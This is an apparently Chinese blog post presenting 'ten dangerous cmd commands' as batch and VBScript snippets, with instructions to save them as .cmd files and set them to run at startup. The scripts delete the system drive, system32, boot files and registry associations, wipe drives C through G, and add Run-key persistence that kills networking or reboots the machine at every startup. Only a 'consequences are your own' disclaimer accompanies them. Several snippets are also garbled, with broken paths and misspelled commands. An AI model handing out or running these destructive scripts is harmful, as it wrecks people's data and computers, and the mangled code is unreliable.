电脑上十大危险的cmd指令 谨慎使用

电脑上十大危险的cmd指令 谨慎使用

杂七杂八小编2020-11-19 20:14:371492A+A-

使用方法:

新建一个txt文档,然后复制进去代码

将.txt后缀名改成cmd保存即可!

如果要开机使用,将这个脚本设置为开机自启即可!

注意:请谨慎使用,所造成后果自己承担

1.死亡蓝屏

C
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

2.更改文件后缀名

C
REN *.Doc *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
BEN *.BAT *.TXT

3.删除系统重要文件

C
del c:\WINDOWS\system32\*.*/q

4.使pc永久崩溃

C
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

5.删除全部注册表

C
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

6.永远禁用网络!

C
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c"windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v
windowsapi/t reg_sz/d c:windowswimn32.bat/f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun/v
controlexit/t reg_sz/d c:windowswimn32.bat/f
pause

7.永远的《回车》

C
set wshshell =wscript.createobject<"wscript.shell">
do
wscript.sleep 100
wshshell.sendkeys"~<enter>"
loop

8.开机就关机

C
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11-f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun
/v startapi /t reg_sz/d c:windowshartlell.bat /f
reg add hkey-current_usersoftwaremicrosoftwindowscurrentversionrun
/v/t reg_sz/d c:windowshartlell.bat /f
PAUSE

9.格式化硬盘

C
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
rd/s/q F:\
rd/s/q g:\

10.开启CD蜂鸣器 不停地响

C
Set oWMP=CreateObject("WMPIayer.0CX.7")
Set colCDROMs=oWMP.cdromCollection
do
if colCDROMs.Count>=1 then
For i=0 to colCDROMs.Count -1
colCDROMs.ltem<i>.Eject
Next
For =0 to colCDROMs.Count -1
colCDROMs.ltem<i>.Eject
Next
End lf
wscript.sleep 100
Loop


点击这里复制本文地址 以上内容源自网络,由小贱阁整理呈现,版权归原作者所有,如有侵犯您的原创版权请告知,我们将尽快删除相关内容。
qrcode

小贱阁 © All Rights Reserved.   桂ICP备18007545号-1
Powered by Z-BlogPHP Themes by xiaojiangs.com
声明:本站部分资源内容基于互联网公开分享,由小贱阁整理呈现,版权归原作者所有。如侵犯到您的权益,请联系本站,我们会尽快处理,谢谢!
联系我们